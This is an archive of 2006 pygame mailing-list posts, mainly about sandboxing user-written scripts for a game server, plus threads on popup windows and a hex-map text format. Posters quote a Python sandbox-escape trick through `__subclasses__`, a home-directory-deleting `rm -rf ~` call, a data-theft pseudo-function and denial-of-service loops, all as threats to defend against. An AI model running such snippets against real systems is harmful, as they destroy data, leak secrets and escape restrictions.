Re: [pygame] Scripting language
Greg Ewing wrote: > Type "help", "copyright", "credits" or "license" for more information. (3).__class__.__bases__[0].__subclasses__()[-3] > Wow, this almost made me fall out of my chair! I use a whitelist technique to disallow calls to all builtins, but I had no idea you could do this. Thanks for that! However, when I tried to exploit this in my level file format, I got: IOError: file() constructor not accessible in restricted mode So I guess it's more complicated than that. It looks like calling eval() or execfile() puts code in "restricted mode" regardless, and disallows file construction period. To quote Steven Bethard on comp.lang.python: "I believe the official stance is something like: 'Well restricted mode probably works in a lot of cases, but we're not confident enough in it (having found bugs in it over and over) that we'd suggest it for production use.'" >> That's the reason why restricted execution was withdrawn from the >> stdlib. Nobody seems to care about security enught to handle this >> (rather difficult) problem. > > That's not entirely true -- there are efforts underway to > come up with a new model for sandboxed execution. It'll probably > be a while before anything usable comes out of that, though. Where can I find information on these efforts? Ethan signature.asc Description: OpenPGP digital signature
Re: [pygame] How can I make another window POP up when I press a key during gameplay
On Tue, 2006-12-19 at 00:21 -0600, Lamonte(Scheols/Demonic) wrote: > Question: How can I make another window POP up when I press a key > during gameplay > Still fairly new to the python style of coding so im wondering on how > to do this the correct way. The SDL library has no way to open second windows. The best way to do something like this is have a different screen in the game with the information you want to show. If you have more specifics on what you want to show there may be better ideas for alternatives.
[pygame] How can I make another window POP up when I press a key during gameplay
Question: How can I make another window POP up when I press a key during gameplay Still fairly new to the python style of coding so im wondering on how to do this the correct way.
Re: [pygame] Scripting language
BTW, it's perfectly possible to eliminate open() and file() from usability.
The only problem is it requires a separate instance of __bulitins__
(therefore probably a separate interpreter)
Try 1:
def fakeopen (filename, mode = 'r', buffering = 0):
... raise NotImplementedError
...
__builtins__.open = fakeopen
__builtins__.file = fakeopen
open ('/dev/urandom', 'rb')
Traceback (most recent call last):
File "", line 1, in
File "", line 2, in fakeopen
NotImplementedError
Try 2 (no, you don't need another interpreter instance!)
def fakeopen (filename, mode = None, buffering = None):
... raise NotImplementedError
...
newbuiltins = dict (vars (__builtins__))
env = {}
newbuiltins['open'] = fakeopen
newbuiltins['file'] = fakeopen
env['__builtins__'] = newbuiltins
# Try to do something VERBOTEN.
script = "f = open('/dev/random','r'); randombyte = f.read (1)"
exec script in env
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
File "", line 2, in fakeopen
NotImplementedError
# now see what nested exec does..
...
script = """exec "f = open('/dev/random','r'); randombyte = f.read(1)";"""
exec script in env
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
File "", line 1, in
File "", line 2, in fakeopen
NotImplementedError
# still works!
...
Unless there is some way to access open() via modules' __builtins__
attribute, or functions' func_globals attribute..
And there is. But it's caught!
script = """exec "import os; f = os.__builtins__['open']('/dev/random','r');
randombyte = f.read(1);f.close()";"""
exec script in env
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
File "", line 1, in
IOError: file() constructor not accessible in restricted mode
I am running Python 2.6 here, and evidently setting __builtins__ in a
globals dictionary activates restricted mode for anything running in it.
Testing nestedness
# now for extreme convolution
...
script = """exec "f = open('/dev/random','r'); randombyte =
f.read(1);f.close()"
in os.__builtins__"""
exec script in env
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
File "", line 1, in
IOError: file() constructor not accessible in restricted mode
:D
Testing silly degree of nestedness:
#and ultimate convolution
...
script = """exec "exec \\\"f = open('/dev/random','r'); randombyte =
f.read(1);f.close()\\\"" in os.__builtins__"""
exec script in env
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
File "", line 1, in
File "", line 1, in
IOError: file() constructor not accessible in restricted mode
So that's pretty locked-down (I haven't tested the os module -- get a
checkout of SVN python if you want to do that.)
Greg, in Python 2.6:
Python 2.6a0 (trunk:52884, Dec 1 2006, 14:21:57)
[GCC 4.0.3 (Ubuntu 4.0.3-1ubuntu5)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
(3).__class__.__bases__[0].__subclasses__()[-3]
(3).__class__.__bases__[0].__subclasses__()[-29]
# It's a nice hack, but it doesn't help you evade restrictions:
exec "(3).__class__.__bases__[0].__subclasses__()[-29]('/dev/urandom')"
in env
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
IOError: file() constructor not accessible in restricted mode
The two other major issues are looping-forever (which can't be fixed really,
except by restricting execution time) and memory usage (I accidentally
created a infinite loop today that expanded Python's memory usage to 500mb).
Greg's idea of running as a seperate process is good for addressing those.
Re: imports -- probably the only fully safe way is to prohibit them
completely, and pre-import chosen safe modules for your scripts' use.
Re: [pygame] map format
Richard Jones wrote: Consider reducing your data down to Python builtin types (list, dict, etc.) and use the marshal module instead. It's faster and has none of the potential hassles of pickling. Although be warned that the marshal format is not guaranteed to remain the same across Python versions, so your marshalled maps might have portability problems. I don't think it has actually changed in an incompatible way for a long time, and the chance of it doing so in the future is probably low, but it could happen. -- Greg
Re: [pygame] Scripting language
On Mon, 2006-12-18 at 16:53 -0500, Brandon N wrote: > Hello all, >This is not strictly a pygame question though it does relate to my > use of pygame in general. What have people used for scripting > languages in Python? I suppose I could use Python itself but I do not > want to expose anything through the use of eval or otherwise > (currently I am doing just about this). While I do not want to write > a language from scratch, I do have a simple Lisp implementation that > I could expose. I would recommend using Scheme :P For my project (Thousand Parsec - http://www.thousandparsec.net ) we had a similar problem. To make the matters worse we also need it to be compatible across C++, Java, PHP, etc. (I even found an implementation in Javascript!) We found that Scheme is the only full language which been reimplemented in almost every other language under the sun. Scheme is very closely related to lisp only is much smaller. There are a few pure python implementations such as pyScheme. You can also wrap C libraries such as mzscheme and guile. It is also pretty trivial to write your own scheme parser and often turns up as an assignment in Computer Science courses. The biggest downside of Scheme is that it's bracket soup. Programs like DrScheme are pretty good in helping you write it however. If you are using Lisp anyway then this isn't a problem for you. Hope this help. Tim Ansell > If this is way too off-topic I'll try to find another place to ask. > > Cheers, >Brandon
Re: [pygame] map format
Arg! I hate thunderbird. To avoid further screw-ups, I've just posted the source for the larger map here (which is actually a .py file): http://brass-golem.com/wp-content/uploads/2006/12/showmap.txt Ignore the comments about kludges... -Jasper Jasper wrote: G, my code got it's line breaks mangled. Try #2: [garbled code snipped]
Re: [pygame] map format
G, my code got it's line breaks mangled. Try #2:
symbolToTerrain = {
'_' : Plains,
'@' : Fertile,
'+' : Desert,
'^' : Mountains,
'*' : Hills,
'$' : Forest,
'%' : Water,
'~' : River,
'&' : WideRiver,
'=' : Roads,
'#' : Bridge,
'!' : Cliff,
}
carteString = '''\
0 1 2 3 4 5
. . . . . . . . .
. . . . . .
. . . _ . . . _ . . . _ .
3 . . . . . . . 3
. % . . . + . . . ^ . . .
. . . . ~ . .
. . . % . . . _ . ! . ^ .
2 . . . . ~ ! . 2
. % . . . $ . . . _ . . .
. . . . # ! .
. . . $ . . . + . ~ . ^ .
1 . = = = . ~ . 1
. _ . . . ^ . . . _ . ~ .
. . . . . ~ .
. . . _ . . . _ . . . _ .
0 . . . . . . . 0
. _ . . . _ . . . _ . . .
. . . . . .
. . . . . . . . .
0 1 2 3 4 5 '''
carteString = '''\
0 1 2 3 4 5 6 7 8 9 10
111213141516171819
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . .
. . . . . . . . . .
. . . . . . . . . .
. . . % . . . % . . . % . . . % . . . % . . .
% . . . % . . . % . . . % . . . % .
9 . . . . . . . . . . .
. . . . . . . . . . 9
. % . . . % . . . % . . . % . . . % . . . % .
. . % . . . % . . . % . . . % . . .
. . . . . . c3c . . . . .
. . . r4c . . r4b . . . . .
. . . ^ . . . % . . . $ . . . % . . . % . . .
% . . . _ . . . _ . . . _ . . . % .
8 . . p3b . . . . p3a . . . r3a . .
. . . p4a . . p4a . . p4a . . . 8
. % . . . % . . . % . . . $ . . . + . . . % .
. . _ . . . $ . . . _ . . . _ . . .
. . . . . . r3b . p3a . r3e . p3a . .
. . p4a . . p4a . c4c . p4a . . p4b . .
. . . ^ . . . $ . . . _ . ~ . + . . . % . . .
% . . . $ . . . $ . . . _ . . . % .
7 . . p3b . r3d . p3b . . p3a ~ ~ p3a . . .
. . . p4a . r4a . p4a . . p4b . r4e . . 7
. % . . . ^ . ~ . $ . ~ . + . ~ . + . . . % .
. . $ . . . ^ . . . $ . . . _ . . .
. . ~ p3b ~ ~ p3b ~ . p3a . c3a ~ p3a . . .
c4a . p4a . . p4a . . p4b . . p4b . .
. . . ^ . ~ . ^ . ~ . $ . . . + . . . % . . .
_ . . . $ . . . ^ . . . $ . . . % .
6 . . p3b . . p3b . . p3a . . p3a . . . .
p4a = . p4a . . p4b . . p4b . . . 6
. % . . . ^ . . . ^ . . . + . . . % . . . % .
. . $ . . . ^ . . . $ . . . _ . . .
. . c3d . p3b . c3b . p3b . r3c . p3a . . . .
. . p4a . . p4a . c4b . p4b . . p4b . .
. . . _ . . . _ . . . _ . . . % . . . % . . .
% . = . ^ . . . $ . . . $ . . . % .
5 . . p3b . . p3b . . p3a . . . . .
. . t1 . p4a . r4d . p4b . . p4b . . . 5
. % . . . % . . . _ . . . % . . . % . . . % .
. . * . . . ^ . . . $ . . . _ . . .
. . . . . p3b . . . . . r2c . .
c1a = p1a . . p4b . . p4b . . p4b . .
. . . % . . . % . . . % . . . % . . . _ . . .
@ . = . ^ . ! . * . . . _ . . . % .
4 . . . . . . . . . c2a = p2a = &
p1a = r1b . p1a ! ! p4b . . p4b . c4d . . 4
. % . . . % . . . % . . . + . . . _ . . . @ .
& . @ . . . * . ! . _ . . . _ . . .
. . . . . . . . . p2a . . p2a
= & p1a = r1c = p1a = ! p4b . . p4b . .
. . . % . . . % . . . % . . . % . = . $ . . .
@ . # . @ . . . $ . ! . $ . . . % .
3 . . . . . c2b . . . . r2b . p2a . .
p2a = ~ p1a . . p1a = ! p4b . . . 3
. % . . . % . . . $ . . . % . . . _ . . . ^ .
. . @ .
Re: [pygame] Scripting language
> I've been reading up on perspective broker since you emailed it and I > think a solution of that sort is the most likely that I will end up > with. Also check out a competing but lesser known technology: "Ice" from http://www.zeroc.com/ Alan
Re: [pygame] map format
I use a map serialization format like this (works best with a fixed
width font):
carteString = '''\
0 1 2 3 4 5
. . . . . . . . .
. . . . . .
. . . _ . . . _ . . . _ .
3 . . . . . . . 3
. % . . . + . . . ^ . . .
. . . . ~ . .
. . . % . . . _ . ! . ^ .
2 . . . . ~ ! . 2
. % . . . $ . . . _ . . .
. . . . # ! .
. . . $ . . . + . ~ . ^ .
1 . = = = . ~ . 1
. _ . . . ^ . . . _ . ~ .
. . . . . ~ .
. . . _ . . . _ . . . _ .
0 . . . . . . . 0
. _ . . . _ . . . _ . . .
. . . . . .
. . . . . . . . .
0 1 2 3 4 5 '''
symbolToTerrain = {
'_' : Plains,
'@' : Fertile,
'+' : Desert,
'^' : Mountains,
'*' : Hills,
'$' : Forest,
'%' : Water,
'~' : River,
'&' : WideRiver,
'=' : Roads,
'#' : Bridge,
'!' : Cliff,
}
The center of each hex represents it's terrain, and the center of each
"hex-side" represents edge terrain (e.g. roads). I also use the 3
characters above and below each hex as labels that work as shorthand for
locations, so that serialization code placing objects into the map can
be more easily read and edited. This also allows naming collections of
hexes to create provinces, etc.
Following is a more concrete serialization that I used to generate the
strategic map seen in this screenshot:
http://brass-golem.com/wp-content/uploads/2006/03/0216-154851_screen1.jpg
-Jasper
carteString = '''\
0 1 2 3 4 5 6 7 8 9 10
111213141516171819
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . .
. . . . . . . . . .
. . . . . . . . . .
. . . % . . . % . . . % . . . % . . . % . . .
% . . . % . . . % . . . % . . . % .
9 . . . . . . . . . . .
. . . . . . . . . . 9
. % . . . % . . . % . . . % . . . % . . . % .
. . % . . . % . . . % . . . % . . .
. . . . . . c3c . . . . .
. . . r4c . . r4b . . . . .
. . . ^ . . . % . . . $ . . . % . . . % . . .
% . . . _ . . . _ . . . _ . . . % .
8 . . p3b . . . . p3a . . . r3a . .
. . . p4a . . p4a . . p4a . . . 8
. % . . . % . . . % . . . $ . . . + . . . % .
. . _ . . . $ . . . _ . . . _ . . .
. . . . . . r3b . p3a . r3e . p3a . .
. . p4a . . p4a . c4c . p4a . . p4b . .
. . . ^ . . . $ . . . _ . ~ . + . . . % . . .
% . . . $ . . . $ . . . _ . . . % .
7 . . p3b . r3d . p3b . . p3a ~ ~ p3a . . .
. . . p4a . r4a . p4a . . p4b . r4e . . 7
. % . . . ^ . ~ . $ . ~ . + . ~ . + . . . % .
. . $ . . . ^ . . . $ . . . _ . . .
. . ~ p3b ~ ~ p3b ~ . p3a . c3a ~ p3a . . .
c4a . p4a . . p4a . . p4b . . p4b . .
. . . ^ . ~ . ^ . ~ . $ . . . + . . . % . . .
_ . . . $ . . . ^ . . . $ . . . % .
6 . . p3b . . p3b . . p3a . . p3a . . . .
p4a = . p4a . . p4b . . p4b . . . 6
. % . . . ^ . . . ^ . . . + . . . % . . . % .
. . $ . . . ^ . . . $ . . . _ . . .
. . c3d . p3b . c3b . p3b . r3c . p3a . . . .
. . p4a . . p4a . c4b . p4b . . p4b . .
. . . _ . . . _ . . . _ . . . % . . . % . . .
% . = . ^ . . . $ . . . $ . . . % .
5 . . p3b . . p3b . . p3a . . . . .
. . t1 . p4a . r4d . p4b . . p4b . . . 5
. % . . . % . . . _ . . . % . . . % . . . % .
. . * . . . ^ . . . $ . . . _ . . .
. . . . . p3b . . . . . r2c . .
c1a = p1a . . p4b . . p4b . . p4b . .
. . . % . . . % . . . % . . . % . . . _ . . .
@ . = . ^ . ! . * . . . _ . . . % .
4 . . . . . . . . . c2a = p2a = &
p1a = r1b . p1a ! ! p4b .
Re: [pygame] Scripting language
On 12/19/06, Greg Ewing <[EMAIL PROTECTED]> wrote: Richard Tew wrote: >> while True: >> pass >> >> def fib(n): >> return fib(n-1) + fib(n-2) >> fib(100) > > If you were using Stackless Python, this sort of thing could > easily be detected, interrupted and discarded. But what about things like x = 1000 ** 1 No :) Stackless' "run for so many Python instructions" mode would not be able to do anything about that. But if you were satisfied with whatever trivial level of Python the recipe could allow, then I imagine this would be something you could use that to guard against. > I wonder if this recipe were taken to the safe extreme, how > much of a subset of Python could be safely allowed: > > http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/286134 Probably not feasible to relax it enough to allow non-trivial code without opening up unwanted abilities. Perhaps. It would be an interesting project for someone to take up though in order to see how far it can be taken safely. Richard.
Re: [pygame] Scripting language
Richard Tew wrote: while True: pass def fib(n): return fib(n-1) + fib(n-2) fib(100) If you were using Stackless Python, this sort of thing could easily be detected, interrupted and discarded. But what about things like x = 1000 ** 1 I wonder if this recipe were taken to the safe extreme, how much of a subset of Python could be safely allowed: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/286134 Probably not feasible to relax it enough to allow non-trivial code without opening up unwanted abilities. -- Greg
Re: [pygame] Scripting language
Jakub Piotr Cłapa wrote: And if you want to expose anything than you leave a way to go through your function to your module and than to anything you want. Just to bring this into sharp focus, consider Python 2.3 (#1, Aug 5 2003, 15:52:30) [GCC 3.1 20020420 (prerelease)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> (3).__class__.__bases__[0].__subclasses__()[-3] So you don't even have to import anything or refer to any names in the builtin namespace to wreak havoc. That's the reason why restricted execution was withdrawn from the stdlib. Nobody seems to care about security enught to handle this (rather difficult) problem. That's not entirely true -- there are efforts underway to come up with a new model for sandboxed execution. It'll probably be a while before anything usable comes out of that, though. As things are, the only way to be completely sure that the user's code can't mess anything up is to run it in a separate process. That has other advantages, too, such as being able to limit memory and CPU usage, which are also difficult or impossible to do within a single Python process. -- Greg
Re: [pygame] Scripting language
On 12/19/06, robomancer <[EMAIL PROTECTED]> wrote:
On the other hand, allowing people to run arbitrary code on your
machine is a Bad Idea even if you *can* ensure that the filesystem
isn't touched. What if they send any of the following?
while True:
pass
def fib(n):
return fib(n-1) + fib(n-2)
fib(100)
If you were using Stackless Python, this sort of thing could
easily be detected, interrupted and discarded. You could
then flag the user who wrote the overly intensive logic
and refuse to run any more (or whatever).
def steal_data():
send_to_client("127.0.0.1", pickle.dump(confidential.data.structure)
I wonder if this recipe were taken to the safe extreme, how
much of a subset of Python could be safely allowed:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/286134
Richard.
Re: [pygame] Scripting language
This is something I'm very interested in.
I'm wondering if Van Rossum is thinking about this these days, but he's been
close-lipped about it on the searches I've done so far.
You can restrict access to imported classes and methods by fiddling with
Properties, kinda easily enough, but then how to apply an access model to it?
Particularly in a PyThreads environment, which is what I'm looking at.
Guess this is well off-topic for pygame but thought I'd throw some petrol on the
fire.
Jon
Quoting Brandon N <[EMAIL PROTECTED]>:
> I've been reading up on perspective broker since you emailed it and I
> think a solution of that sort is the most likely that I will end up
> with.
>
> As for the examples you have posted, I had a rudimentary Python-like
> scripting language I've been building that is translated to Python
> after validation (against things like forever loops, unregistered
> function calls and the like), but I agree that no amount of work will
> really close the gaping holes that exist for abuse my malicious and
> unknowing users.
>
> Cheers,
>Brandon
>
> On Dec 18, 2006, at 7:14 PM, robomancer wrote:
>
> >> I like the way Brian just sent before. I dont know any language that
> >> restricts its usage (would be neat feature for certain projects).
> >
> > Perl has "taint mode". When enabled, Perl won't let you do any
> > "dangerous" operations (file accesses, system calls, etc) on data that
> > originally came from the user and hasn't been processed to remove its
> > "taintedness".
> >
> > On the other hand, allowing people to run arbitrary code on your
> > machine is a Bad Idea even if you *can* ensure that the filesystem
> > isn't touched. What if they send any of the following?
> >
> > while True:
> > pass
> >
> > def fib(n):
> > return fib(n-1) + fib(n-2)
> > fib(100)
> >
> > def steal_data():
> > send_to_client("127.0.0.1", pickle.dump(confidential.data.structure)
> >
> > There are just so many ways to exploit arbitrary code execution, from
> > malicious data corruption to denial-of-service to buffer-overflow
> > exploits (yes, this is possible even from within Python, if you use
> > any buggy C extension modules)... it's *really* not a good idea. A
> > lot of very smart people have worked hard to solve this sort of
> > problem, and not made much progress.
> >
> > I either recommend having an explicit server/client API and forcing
> > people to use that API (whether it's invoked via Perspective Broker as
> > I suggested earlier, or something more standard like XML-RPC, CORBA,
> > or SOAP), or not allowing a "scripting language" at all, instead
> > opting for something like customizable configuration files that aren't
> > Turing-complete.
>
>
Come and visit Web Prophets Website at http://www.webprophets.net.au
Re: [pygame] Scripting language
I've been reading up on perspective broker since you emailed it and I
think a solution of that sort is the most likely that I will end up
with.
As for the examples you have posted, I had a rudimentary Python-like
scripting language I've been building that is translated to Python
after validation (against things like forever loops, unregistered
function calls and the like), but I agree that no amount of work will
really close the gaping holes that exist for abuse my malicious and
unknowing users.
Cheers,
Brandon
On Dec 18, 2006, at 7:14 PM, robomancer wrote:
I like the way Brian just sent before. I dont know any language that
restricts its usage (would be neat feature for certain projects).
Perl has "taint mode". When enabled, Perl won't let you do any
"dangerous" operations (file accesses, system calls, etc) on data that
originally came from the user and hasn't been processed to remove its
"taintedness".
On the other hand, allowing people to run arbitrary code on your
machine is a Bad Idea even if you *can* ensure that the filesystem
isn't touched. What if they send any of the following?
while True:
pass
def fib(n):
return fib(n-1) + fib(n-2)
fib(100)
def steal_data():
send_to_client("127.0.0.1", pickle.dump(confidential.data.structure)
There are just so many ways to exploit arbitrary code execution, from
malicious data corruption to denial-of-service to buffer-overflow
exploits (yes, this is possible even from within Python, if you use
any buggy C extension modules)... it's *really* not a good idea. A
lot of very smart people have worked hard to solve this sort of
problem, and not made much progress.
I either recommend having an explicit server/client API and forcing
people to use that API (whether it's invoked via Perspective Broker as
I suggested earlier, or something more standard like XML-RPC, CORBA,
or SOAP), or not allowing a "scripting language" at all, instead
opting for something like customizable configuration files that aren't
Turing-complete.
Re: [pygame] Scripting language
Sorry, I disagree (let's flaame!! ;) ) When you initially cook up a 'little scripting language', and there it sits, dripping wet and shining new, it usually does what you want. Pretty much. Almost. Then you go to add something. Then something else. Then you find a bug Pretty soon you find yourself wondering "Gee, I've basically re-written something that already exists and works better than what I've done anyway". Been there! Done that! My 2c! :) Jon Quoting Brian Fisher <[EMAIL PROTECTED]>: > On 12/18/06, JoN <[EMAIL PROTECTED]> wrote: > > Generally when you've got an excellent scripting language already, and > lets' > > face it Python is the Best (:)), re-inventing the wheel is not something > you > > want to do! > > > I totally agree that re-inventing the wheel is not something you want > to do - but trying to use the very best jet engine in the world as a > wheel on your car... won't have your car performing well as a car (or > as a jet) > > Basically, I think some "scripting" options that don't have users > typing out code make a lot of sense for certain classes of stuff > Come and visit Web Prophets Website at http://www.webprophets.net.au
Re: [pygame] Scripting language
I like the way Brian just sent before. I dont know any language that
restricts its usage (would be neat feature for certain projects).
Perl has "taint mode". When enabled, Perl won't let you do any
"dangerous" operations (file accesses, system calls, etc) on data that
originally came from the user and hasn't been processed to remove its
"taintedness".
On the other hand, allowing people to run arbitrary code on your
machine is a Bad Idea even if you *can* ensure that the filesystem
isn't touched. What if they send any of the following?
while True:
pass
def fib(n):
return fib(n-1) + fib(n-2)
fib(100)
def steal_data():
send_to_client("127.0.0.1", pickle.dump(confidential.data.structure)
There are just so many ways to exploit arbitrary code execution, from
malicious data corruption to denial-of-service to buffer-overflow
exploits (yes, this is possible even from within Python, if you use
any buggy C extension modules)... it's *really* not a good idea. A
lot of very smart people have worked hard to solve this sort of
problem, and not made much progress.
I either recommend having an explicit server/client API and forcing
people to use that API (whether it's invoked via Perspective Broker as
I suggested earlier, or something more standard like XML-RPC, CORBA,
or SOAP), or not allowing a "scripting language" at all, instead
opting for something like customizable configuration files that aren't
Turing-complete.
Re: [pygame] Scripting language
I did find Lua in Python (http://labix.org/lunatic-python) though it seems to expose the Python environment within Lua which is a deal- breaker.
Re: [pygame] Scripting language
Yeah, I have been afraid of this being the case given that all my research indicated it. Thanks for the link, I agree that they are unsatisfactory, but at least it is a step in determining what exactly is available. Brian, I had actually given thought to something akin to the system you detailed after a discussion with a peer. I had also considered building a visual/drag-and-drop/list system that would output an easily verified python-like language. Upon receipt at the server, this would be validated (for variable use, methods) and converted to Python. Thanks everyone for the lively discussion. I am mostly surprised at the lack of a mainstream solution (or several) though I wonder if it is as a result of the common perception of C++ being "the" game development language and everything else being a secondary scripting language. I have found a Python in Ruby, but is there a Ruby in Python or Lua for that matter? Cheers, Brandon On Dec 18, 2006, at 6:27 PM, Bob the Hamster wrote: I have read a lot about this, and the general consensus seems to be that if you are worried about security, there is no known safe easy way to embed python-in-python. That conclusion surprises and disappoints me, but I can find no reliable information that contraticts it :( Some unsatisfactory workarounds can be found at: http://wiki.python.org/moin/ How_can_I_run_an_untrusted_Python_script_safely_(i.e._Sandbox) --- Bob the Hamster
Re: [pygame] Scripting language
On 12/18/06, JoN <[EMAIL PROTECTED]> wrote: Generally when you've got an excellent scripting language already, and lets' face it Python is the Best (:)), re-inventing the wheel is not something you want to do! I totally agree that re-inventing the wheel is not something you want to do - but trying to use the very best jet engine in the world as a wheel on your car... won't have your car performing well as a car (or as a jet) Basically, I think some "scripting" options that don't have users typing out code make a lot of sense for certain classes of stuff
Re: [pygame] Scripting language
Hmm true for file opening. Adding paths needs the OS module, but you're right. I like the way Brian just sent before. I dont know any language that restricts its usage (would be neat feature for certain projects). Am 19.12.2006 um 00:27 schrieb Jakub Piotr Cłapa: Farai Aschwanden wrote: Ok, as far as I understand now you want to let players changing their Avatars over a script language via Internet. Hmmm, nice feature letting players create their own scripts. Well, Im not a security guy but letting others use any (script) language that is technically able to access the directory structure of the system is risky. Whether its Python or any other not self written language you want to offer to you users I only see the following options: - The user scripts are running on a exposed machine - The user rights are strongly restricted - The script language you offer to players is limited in its functionality (checking commands of players must be done then) Maybe it already helps if you dont allow certain import functionalities (specially no direct disk access). The problem is that disk access is a built-in in Python. And if you want to expose anything than you leave a way to go through your function to your module and than to anything you want. That's the reason why restricted execution was withdrawn from the stdlib. Nobody seems to care about security enught to handle this (rather difficult) problem. -- regards, Jakub Piotr Cłapa
Re: [pygame] Scripting language
On 12/18/06, Brandon N <[EMAIL PROTECTED]> wrote: Anyway, I am using Python as the development language for both the client and server in a project I am working on. Now, I want to be able to expose certain functionality for scripting other than the internal development kind I have been doing with Python. That is, users can write scripts that affect the behavior of their avatars in the world. Hmmm... if you want to have users able to write these scripts and you want to have what they are capable of to be "sandboxed", I'd recommend a system where scripting is done by creating instances of classes that represent logic and actions in the scripting system, and then making an editor that allows you to build trees of these objects by picking which object you want connected to another (using a drop down) and then you edit their properties to change what the actions & logic do. So like, when your game objects execute script (on events or whatever) that would look something like this: self.script.execute(self, context) and maybe the userused the editor to make the script property point to an instance of the IfThenScript class instance, which you wrote to have an execute method something like this: def execute(self, owner, context): if self.condition.evaluate(owner, content): self.then_clause.execute(owner, context) else: self.else_clause.execute(owner, context) and the IfThenScript instance's condition and then_clause and else_clause would all be instances of some other scripting class types you wrote that the user hooked up using the editor I like it because then there is no parsing or syntax issues to deal with (i.e it's hard for the user to make something invalid vs. them having to type out code), and it's very easy for users to learn what they can do because they have to pick which class they can use in what situation from a list. Finally, it's easier to show and manipulate visually if you do your editor well. Python is good for this too because of all it's reflection capabilities (you can enumerate derived classes, get class types, enumerate properties, etc.). In addition python already has serialization (so you can pretty much just pickle and unpickle your trees of scripting objects, although you may want to do some extra work there for the sake of security) The biggest cost there would be writing an editor for users to build and modify your scripting objects.
Re: [pygame] Scripting language
> Quoting Brandon N <[EMAIL PROTECTED]>: > > > Hello all, > >This is not strictly a pygame question though it does relate to my > > use of pygame in general. What have people used for scripting > > languages in Python? I suppose I could use Python itself but I do not > > want to expose anything through the use of eval or otherwise > > (currently I am doing just about this). While I do not want to write > > a language from scratch, I do have a simple Lisp implementation that > > I could expose. I have read a lot about this, and the general consensus seems to be that if you are worried about security, there is no known safe easy way to embed python-in-python. That conclusion surprises and disappoints me, but I can find no reliable information that contraticts it :( Some unsatisfactory workarounds can be found at: http://wiki.python.org/moin/How_can_I_run_an_untrusted_Python_script_safely_(i.e._Sandbox) --- Bob the Hamster
Re: [pygame] Scripting language
Farai Aschwanden wrote: Ok, as far as I understand now you want to let players changing their Avatars over a script language via Internet. Hmmm, nice feature letting players create their own scripts. Well, Im not a security guy but letting others use any (script) language that is technically able to access the directory structure of the system is risky. Whether its Python or any other not self written language you want to offer to you users I only see the following options: - The user scripts are running on a exposed machine - The user rights are strongly restricted - The script language you offer to players is limited in its functionality (checking commands of players must be done then) Maybe it already helps if you dont allow certain import functionalities (specially no direct disk access). The problem is that disk access is a built-in in Python. And if you want to expose anything than you leave a way to go through your function to your module and than to anything you want. That's the reason why restricted execution was withdrawn from the stdlib. Nobody seems to care about security enught to handle this (rather difficult) problem. -- regards, Jakub Piotr Cłapa
Re: [pygame] Scripting language
it seems safer to just use something external and expose only the objects and methods I choose to allow. This doesn't answer your original question, but I'll suggest it in case it helps... Perhaps you should look at something like Twisted's Perspective Broker. It's hard to wrap your head around, but it allows you to declare certain data types and methods as "callable" by clients of a server. Then your scripting language can be Python, and the clients can run whatever code they want (including removing their own home directories if they really want to :P) but they can't run arbitrary code on your server, only specific functions that you manually mark as "ok" for remote clients to call.
Re: [pygame] Scripting language
Ok, as far as I understand now you want to let players changing their Avatars over a script language via Internet. Hmmm, nice feature letting players create their own scripts. Well, Im not a security guy but letting others use any (script) language that is technically able to access the directory structure of the system is risky. Whether its Python or any other not self written language you want to offer to you users I only see the following options: - The user scripts are running on a exposed machine - The user rights are strongly restricted - The script language you offer to players is limited in its functionality (checking commands of players must be done then) Maybe it already helps if you dont allow certain import functionalities (specially no direct disk access). Greetings Farai Am 19.12.2006 um 00:05 schrieb Brandon N: Hello Farai, I prefer to not dismiss Python as simply a scripting language. :p Anyway, I am using Python as the development language for both the client and server in a project I am working on. Now, I want to be able to expose certain functionality for scripting other than the internal development kind I have been doing with Python. That is, users can write scripts that affect the behavior of their avatars in the world. I do not want to expose Python itself (at least, the same environment that the server is running in) because it seems relatively easy to reach outside of one's module in Python to muck with internal settings. I certainly cannot check for every piece of unsafe code and users will not have the server source so as to easily engineer such a thing, but it seems safer to just use something external and expose only the objects and methods I choose to allow. Thanks, Brandon On Dec 18, 2006, at 5:51 PM, Farai Aschwanden wrote: Hello Brandon Maybe I missunderstand you but Python IS a scripting language. What is your intention using Python? Farai Am 18.12.2006 um 22:53 schrieb Brandon N: Hello all, This is not strictly a pygame question though it does relate to my use of pygame in general. What have people used for scripting languages in Python? I suppose I could use Python itself but I do not want to expose anything through the use of eval or otherwise (currently I am doing just about this). While I do not want to write a language from scratch, I do have a simple Lisp implementation that I could expose. If this is way too off-topic I'll try to find another place to ask. Cheers, Brandon
Re: [pygame] Scripting language
Hate to say it but, really I'd say its best to use Python itself and implement any protection you want by other means (eg. fiddling with properties). Securing python code is something I've had a little look into, as I'm working on something that allows pickled objects to launch pythreads, which opens up an MSwindows like vista (sic) of virus vectors. Generally when you've got an excellent scripting language already, and lets' face it Python is the Best (:)), re-inventing the wheel is not something you want to do! Jon Quoting Brandon N <[EMAIL PROTECTED]>: > Hello all, >This is not strictly a pygame question though it does relate to my > use of pygame in general. What have people used for scripting > languages in Python? I suppose I could use Python itself but I do not > want to expose anything through the use of eval or otherwise > (currently I am doing just about this). While I do not want to write > a language from scratch, I do have a simple Lisp implementation that > I could expose. > > If this is way too off-topic I'll try to find another place to ask. > > Cheers, >Brandon > Come and visit Web Prophets Website at http://www.webprophets.net.au
Re: [pygame] Scripting language
That is the sort of thing I do not want to expose.
(And that would remove the current users home directory.)
On Dec 18, 2006, at 6:02 PM, Luke Paireepinart wrote:
Patrick Mullen wrote:
I don't see how this is safer...
def make_ball_bounce(ball):
import os
os.system('rm -rf ~')
(I don't know what that does, since I am not on Linux. I got it
from http://mail.python.org/pipermail/python-list/2002-July/
155190.html ,
but I suspect it does something bad :))
Re: [pygame] Scripting language
